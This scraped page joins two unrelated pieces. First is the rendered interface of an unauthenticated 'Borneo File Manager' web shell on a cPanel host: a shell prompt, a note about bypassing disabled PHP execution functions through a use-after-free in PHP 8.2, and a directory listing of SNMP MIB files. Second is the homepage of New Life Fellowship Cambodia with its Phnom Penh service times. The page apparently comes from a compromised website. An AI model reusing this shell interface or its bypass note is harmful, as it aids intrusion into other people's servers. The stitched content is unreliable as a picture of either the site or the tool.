Borneo File Manager
File Manager v1.0
Linux 5.14.0-611.49.2.el9_7.x86_64 nlfcambodia No Auth
Features
Scanner
Tools
nlfcambodia@lc-cpanel.lifenz.org $
Exec: Disabled | Bypass: UAF PHP 8.2 | Disabled: exec,passthru,shell_exec,system
Name Type Size Permission Actions
AGENTX-MIB.txt File 17.05 KB 0644
BRIDGE-MIB.txt File 49.75 KB 0644
DISMAN-EVENT-MIB.txt File 66.51 KB 0644
DISMAN-SCHEDULE-MIB.txt File 24.04 KB 0644
DISMAN-SCRIPT-MIB.txt File 62.8 KB 0644
EtherLike-MIB.txt File 82.51 KB 0644
HCNUM-TC.txt File 4.55 KB 0644
HOST-RESOURCES-MIB.txt File 51.31 KB 0644
HOST-RESOURCES-TYPES.txt File 10.33 KB 0644
IANA-ADDRESS-FAMILY-NUMBERS-MIB.txt File 6.78 KB 0644
IANA-LANGUAGE-MIB.txt File 4.28 KB 0644
IANA-RTPROTO-MIB.txt File 4 KB 0644
IANAifType-MIB.txt File 36.75 KB 0644
IF-INVERTED-STACK-MIB.txt File 4.95 KB 0644
IF-MIB.txt File 70.01 KB 0644
INET-ADDRESS-MIB.txt File 16.39 KB 0644
IP-FORWARD-MIB.txt File 45.2 KB 0644
IP-MIB.txt File 181.32 KB 0644
IPV6-FLOW-LABEL-MIB.txt File 1.98 KB 0644
IPV6-ICMP-MIB.txt File 20.56 KB 0644
IPV6-MIB.txt File 55.14 KB 0644
IPV6-TC.txt File 3.08 KB 0644
IPV6-TCP-MIB.txt File 8.65 KB 0644
IPV6-UDP-MIB.txt File 5.56 KB 0644
LM-SENSORS-MIB.txt File 5.79 KB 0644
MTA-MIB.txt File 41.38 KB 0644
NET-SNMP-AGENT-MIB.txt File 15.53 KB 0644
NET-SNMP-EXAMPLES-MIB.txt File 8.95 KB 0644
NET-SNMP-EXTEND-MIB.txt File 9.11 KB 0644
NET-SNMP-MIB.txt File 1.99 KB 0644
NET-SNMP-PASS-MIB.txt File 3.64 KB 0644
NET-SNMP-TC.txt File 4.7 KB 0644
NET-SNMP-VACM-MIB.txt File 4.92 KB 0644
NETWORK-SERVICES-MIB.txt File 20.51 KB 0644
NOTIFICATION-LOG-MIB.txt File 24.12 KB 0644
RFC-1215.txt File 1.15 KB 0644
RFC1155-SMI.txt File 3 KB 0644
RFC1213-MIB.txt File 77.8 KB 0644
RMON-MIB.txt File 144.36 KB 0644
SCTP-MIB.txt File 44.26 KB 0644
SMUX-MIB.txt File 4.54 KB 0644
SNMP-COMMUNITY-MIB.txt File 15.13 KB 0644
SNMP-FRAMEWORK-MIB.txt File 21.82 KB 0644
SNMP-MPD-MIB.txt File 5.37 KB 0644
SNMP-NOTIFICATION-MIB.txt File 19.54 KB 0644
SNMP-PROXY-MIB.txt File 8.89 KB 0644
SNMP-TARGET-MIB.txt File 22.24 KB 0644
SNMP-TLS-TM-MIB.txt File 42.9 KB 0644
SNMP-TSM-MIB.txt File 8.7 KB 0644
SNMP-USER-BASED-SM-MIB.txt File 38.28 KB 0644
SNMP-USM-AES-MIB.txt File 2.15 KB 0644
SNMP-USM-DH-OBJECTS-MIB.txt File 20.61 KB 0644
SNMP-USM-HMAC-SHA2-MIB.txt File 4.3 KB 0644
SNMP-VIEW-BASED-ACM-MIB.txt File 33.36 KB 0644
SNMPv2-CONF.txt File 8.07 KB 0644
SNMPv2-MIB.txt File 28.62 KB 0644
SNMPv2-SMI.txt File 8.71 KB 0644
SNMPv2-TC.txt File 37.14 KB 0644
SNMPv2-TM.txt File 5.64 KB 0644
TCP-MIB.txt File 27.89 KB 0644
TRANSPORT-ADDRESS-MIB.txt File 16.03 KB 0644
TUNNEL-MIB.txt File 27.17 KB 0644
UCD-DEMO-MIB.txt File 2.11 KB 0644
UCD-DISKIO-MIB.txt File 4.85 KB 0644
UCD-DLMOD-MIB.txt File 3.01 KB 0644
UCD-IPFWACC-MIB.txt File 7.93 KB 0644
UCD-SNMP-MIB.txt File 52.09 KB 0644
UDP-MIB.txt File 20.39 KB 0644
New Life Fellowship Cambodia | Cambodia Churches, NGO, Children, Jesus in Cambodia

Welcome to New Life Fellowship Cambodia

Our Existence

New Life Fellowship exists to be a community of overflowing love so that people encounter God’s presence.

Gloriying

We live in communion with God, submit to His leading, and glorify Him in everything we do.

Witnessing

We are committed to making a difference in the world by revealing Christ's likeness in our lives.

Multiplying

We are on mission for Jesus to obey His great commission in our lives.

Join Our

Sunday Services

We have three locations in Phnom Penh city.

Main Campus Steung Mean Chey

  • Sunday 8:00-9:30 AM
  • Sunday 10:30-12:00 Noon
  • Sunday 5:30-7:00 PM

Find Us

New Life Fellowship Chrouy Changva

  • Morning Service Time (Sunday 9:00-11:00 AM)

Find Us

South Campus Dangkao

  • Sunday 3:00-5:00 PM

Find Us

New Life Fellowship Choam Chao

  • Weekly CellGroup Meeting
    2nd and 4th Sunday at 5:30-7:30PM

Find Us